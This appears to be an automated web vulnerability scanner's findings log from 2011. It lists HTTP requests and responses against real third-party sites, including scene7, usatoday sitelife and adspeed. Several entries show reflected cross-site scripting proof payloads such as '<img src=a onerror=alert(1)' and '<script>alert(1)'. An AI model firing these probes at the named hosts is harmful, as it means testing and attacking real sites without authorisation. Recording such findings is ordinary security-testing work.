GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:37:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:24 GMT Connection: close X-N: S Unable to find /bluestembrands/NC208_WM1 |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:37:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:28 GMT Connection: close X-N: S Unable to find /bluestembrands/NC330_VA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:37:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:05 GMT Connection: close X-N: S Unable to find /bluestembrands/NC364_VA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:37:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:42 GMT Connection: close X-N: S Unable to find /bluestembrands/NC873_WM1 |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:36:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:36:32 GMT Connection: close X-N: S Unable to find /bluestembrands/ND797_VA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 86 Expires: Mon, 16 May 2011 01:38:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:38:45 GMT Connection: close X-N: S Unable to find /bluestembrands/ND877_A |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:36:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:36:26 GMT Connection: close X-N: S Unable to find /bluestembrands/NE440_WM1 |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:36:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:36:38 GMT Connection: close X-N: S Unable to find /bluestembrands/NE682_WVA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:36:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:36:12 GMT Connection: close X-N: S Unable to find /bluestembrands/NE967_WM1 |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:38:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:38:43 GMT Connection: close X-N: S Unable to find /bluestembrands/NH642_VA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:37:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:27 GMT Connection: close X-N: S Unable to find /bluestembrands/NI736_WVA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:36:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:36:37 GMT Connection: close X-N: S Unable to find /bluestembrands/NJ310_WM1 |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:37:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:17 GMT Connection: close X-N: S Unable to find /bluestembrands/NJ484_WVA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:38:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:38:20 GMT Connection: close X-N: S Unable to find /bluestembrands/NJ847_VA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:38:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:38:08 GMT Connection: close X-N: S Unable to find /bluestembrands/NK248_VC |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 86 Expires: Mon, 16 May 2011 01:38:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:38:13 GMT Connection: close X-N: S Unable to find /bluestembrands/NL522_A |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:37:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:28 GMT Connection: close X-N: S Unable to find /bluestembrands/NL578_WVA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:37:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:28 GMT Connection: close X-N: S Unable to find /bluestembrands/NM486_VC |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:38:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:38:12 GMT Connection: close X-N: S Unable to find /bluestembrands/NQ086_VA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:38:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:38:42 GMT Connection: close X-N: S Unable to find /bluestembrands/NQ087_VA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:37:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:27 GMT Connection: close X-N: S Unable to find /bluestembrands/NQ582_WVA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:37:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:25 GMT Connection: close X-N: S Unable to find /bluestembrands/NR042_WVA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:37:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:50 GMT Connection: close X-N: S Unable to find /bluestembrands/NR149_WVA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:37:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:29 GMT Connection: close X-N: S Unable to find /bluestembrands/NS372_WVA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 84 Expires: Mon, 16 May 2011 01:37:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:00 GMT Connection: close X-N: S Unable to find /bluestembrands/h6381_4008eb52<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 84 Expires: Mon, 16 May 2011 01:36:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:36:59 GMT Connection: close X-N: S Unable to find /bluestembrands/j7804_400c5b08<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 84 Expires: Mon, 16 May 2011 01:36:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:36:58 GMT Connection: close X-N: S Unable to find /bluestembrands/n4728_400c9dce<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://sales.liveperson |
Path: | /hc/71737897/ |
GET /hc/71737897/?&visitor Host: sales.liveperson.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: HumanClickKEY=154731 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:21:46 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickKEY=154731 Set-Cookie: HumanClickKEY=154731 Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Sun, 15 May 2011 21:21:46 GMT Set-Cookie: HumanClickSiteContainerID Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 31409 lpConnLib.Process({ ...[SNIP]... code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://serv.adspeed.com |
Path: | /ad.php |
GET /ad.php?do=html&zid=3253 Host: serv.adspeed.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK P3P: policyref="http://serv Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Mon, 16 May 2011 01:20:56 GMT Server: AdSpeed/s3 Content-Length: 400 <html><head><title>Ad Serving Error Message</title></head> ...[SNIP]... <img style="border:0px;" src="http://serv.adspeed ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://serv.adspeed.com |
Path: | /ad.php |
GET /ad.php?do=html&zid=3253 Host: serv.adspeed.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK P3P: policyref="http://serv Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Mon, 16 May 2011 01:20:48 GMT Server: AdSpeed/s3 Content-Length: 400 <html><head><title>Ad Serving Error Message</title></head> ...[SNIP]... <img style="border:0px;" src="http://serv.adspeed ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 89581 Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:30:59 GMT Connection: close plcb04a6bd<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 34494 Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:30:32 GMT Connection: close plcb0('\r\n\r\n<div class=\"pluck-app ...[SNIP]... <div id=\"pluck_comments_10078 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 34817 Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:30:15 GMT Connection: close plcb0('\r\n\r\n<div class=\"pluck-app ...[SNIP]... _comments_79209\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sony.links |
Path: | /pages/prices.asp |
GET /pages/prices.asp?nrgid Host: sony.links.channelin Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: serverstamp=4B88CCEA-94CF |
